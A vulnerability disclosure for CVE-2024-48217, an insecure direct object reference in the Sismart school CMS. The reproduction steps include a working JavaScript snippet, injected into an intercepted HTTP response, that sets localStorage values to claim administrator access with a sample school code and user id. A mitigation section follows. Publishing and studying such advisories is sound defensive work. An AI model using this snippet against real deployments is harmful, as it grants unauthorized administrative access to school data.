ajrielrm/CVE-2024-48217
CVE-2024-48217 Sismart Vulnerability

CVE Assigned: CVE-2024-48217 (mitre.org, nvd.nist.org, tenable.com)

Date:

5 September 2024

Author:

Ajriel Rizqy Maulana

Software Link:

Version:

7.4.0

Vulnerability:

IDOR - Inside the Session Storage

IDOR stands for Insecure Direct Object Reference, a vulnerability that falls under the broken access control category. In brief, it arises when an application uses user-supplied input to access an object directly, without checking that the requester is allowed to access that object. An insecure direct object reference makes horizontal privilege escalation possible (acting as another user of the same level) and in some cases leads to vertical privilege escalation as well.

Affected Components:

https://cms.sismart.id/sekolah/

  • sekolah_kode parameter within the Local Storage.
  • user_id parameter within the Local Storage.
  • user_level parameter within the Local Storage.

Description:

Unlike a normal IDOR, an IDOR in session or local storage is different in nature: tampering with the stored values does not always make permanent (server-side) changes. The severity, however, is the same, because the application trusts those client-side values when deciding who the user is and what they may access.

Steps to reproduce:


Unmodified HTTP Response:

HTTP/2 200 OK
Date: Fri, 01 Nov 2024 11:44:22 GMT
Content-Type: text/html
Last-Modified: Mon, 01 May 2023 02:36:30 GMT
Cf-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KJnz9T9%2FG1GNLgvfWtpZFaY10aFkzyrkTUNVdK34tYTcoWnGvxnG7y9lQi%2BxdFQ%2Bd4jjab38wLGtsgIlOxaBbo2TvjTKA6newy7qBGD8jQKTwH9xSM9PVgmnNdHodgx0ew%3D%3D"}],"group":"cf-nel","max_age":604800}
Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
Cf-Ray: 8dbba1ea4a99658f-SIN
Alt-Svc: h3=":443"; ma=86400
Server-Timing: cfL4;desc="?proto=TCP&rtt=32972&sent=758&recv=340&lost=0&retrans=102&sent_bytes=994646&recv_bytes=2733&delivery_rate=2462437&cwnd=257&unsent_bytes=0&cid=706fd40c05668fc1&ts=24672&x=0"

<!doctype html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no"><link href="https://fonts.googleapis.com/css?family=Poppins:300,400,500,600,700|Roboto:300,400,500,600,700|Material+Icons" rel="stylesheet"><link rel="stylesheet" href="https://unicons.iconscout.com/release/v4.0.0/css/line.css"/><title>Sismart | Login</title><script defer="defer" type="module" src="/js/chunk-vendors.fd6f44e8.js"></script><script defer="defer" type="module" src="/js/app.741d68f7.js"></script><link href="/css/chunk-vendors.582cc66a.css" rel="stylesheet"><link href="/css/app.d5b7c7c2.css" rel="stylesheet"><script defer="defer" src="/js/chunk-vendors-legacy.fd6f44e8.js" nomodule></script><script defer="defer" src="/js/app-legacy.350b7c53.js" nomodule></script></head><body style="--kt-toolbar-height:55px;--kt-toolbar-height-tablet-and-mobile:55px"><noscript><strong>We're sorry but metronic-vue doesn't work properly without JavaScript enabled. Please enable it to continue.</strong></noscript><div id="app" class="d-flex flex-column flex-root"></div><script src="https://requirejs.org/docs/release/2.1.15/minified/require.js"></script><script src="https://rawgit.com/ironwallaby/delaunay/master/delaunay.js"></script></body></html>
  • Step 3 - Add a script to modify the Local Storage and redirect to /sekolah:
    • Set the sekolah_kode to the desired school code.
    • Set the user_id to the desired administrator's user id.
    • Set the user_level to administrator.
    • Set the id_token to undefined.
    • Edit the response and set all of the above with this JavaScript snippet:

    <script>
      localStorage.setItem('sekolah_kode', 'school_id');
      localStorage.setItem('user_id', '0000');
      localStorage.setItem('user_level', 'role (ex:administrator)');
      localStorage.setItem('id_token', 'undefined');
      window.location.href = '/sekolah';
    </script>


Modified HTTP Response:

HTTP/2 200 OK
Date: Fri, 01 Nov 2024 11:44:22 GMT
Content-Type: text/html
Last-Modified: Mon, 01 May 2023 02:36:30 GMT
Cf-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KJnz9T9%2FG1GNLgvfWtpZFaY10aFkzyrkTUNVdK34tYTcoWnGvxnG7y9lQi%2BxdFQ%2Bd4jjab38wLGtsgIlOxaBbo2TvjTKA6newy7qBGD8jQKTwH9xSM9PVgmnNdHodgx0ew%3D%3D"}],"group":"cf-nel","max_age":604800}
Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
Cf-Ray: 8dbba1ea4a99658f-SIN
Alt-Svc: h3=":443"; ma=86400
Server-Timing: cfL4;desc="?proto=TCP&rtt=32972&sent=758&recv=340&lost=0&retrans=102&sent_bytes=994646&recv_bytes=2733&delivery_rate=2462437&cwnd=257&unsent_bytes=0&cid=706fd40c05668fc1&ts=24672&x=0"

<!doctype html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no"><link href="https://fonts.googleapis.com/css?family=Poppins:300,400,500,600,700|Roboto:300,400,500,600,700|Material+Icons" rel="stylesheet"><link rel="stylesheet" href="https://unicons.iconscout.com/release/v4.0.0/css/line.css"/><title>Sismart | Login</title><script defer="defer" type="module" src="/js/chunk-vendors.fd6f44e8.js"></script><script defer="defer" type="module" src="/js/app.741d68f7.js"></script><link href="/css/chunk-vendors.582cc66a.css" rel="stylesheet"><link href="/css/app.d5b7c7c2.css" rel="stylesheet"><script defer="defer" src="/js/chunk-vendors-legacy.fd6f44e8.js" nomodule></script><script defer="defer" src="/js/app-legacy.350b7c53.js" nomodule></script></head><body style="--kt-toolbar-height:55px;--kt-toolbar-height-tablet-and-mobile:55px"><noscript><strong>We're sorry but metronic-vue doesn't work properly without JavaScript enabled. Please enable it to continue.</strong></noscript><div id="app" class="d-flex flex-column flex-root"></div><script src="https://requirejs.org/docs/release/2.1.15/minified/require.js"></script><script src="https://rawgit.com/ironwallaby/delaunay/master/delaunay.js"></script>
<script>
    localStorage.setItem('sekolah_kode', 'smkbnif');
    localStorage.setItem('user_id', '3301');
    localStorage.setItem('user_level', 'administrator');
    localStorage.setItem('id_token', 'undefined');
    window.location.href = '/sekolah';
</script>

</body></html>
  • Step 4 - Forward the response

Proof of Concept:

[screenshot: proof of concept]

Mitigation:

An access check must be conducted on the server for every referenced object, verifying that the authenticated user is allowed to access it. Additionally, authentication and authorization checks must be enforced server-side rather than derived from client-controlled values such as Local Storage entries. Furthermore, sequential numeric IDs should be replaced with non-guessable alphanumeric identifiers, for example a random UID.
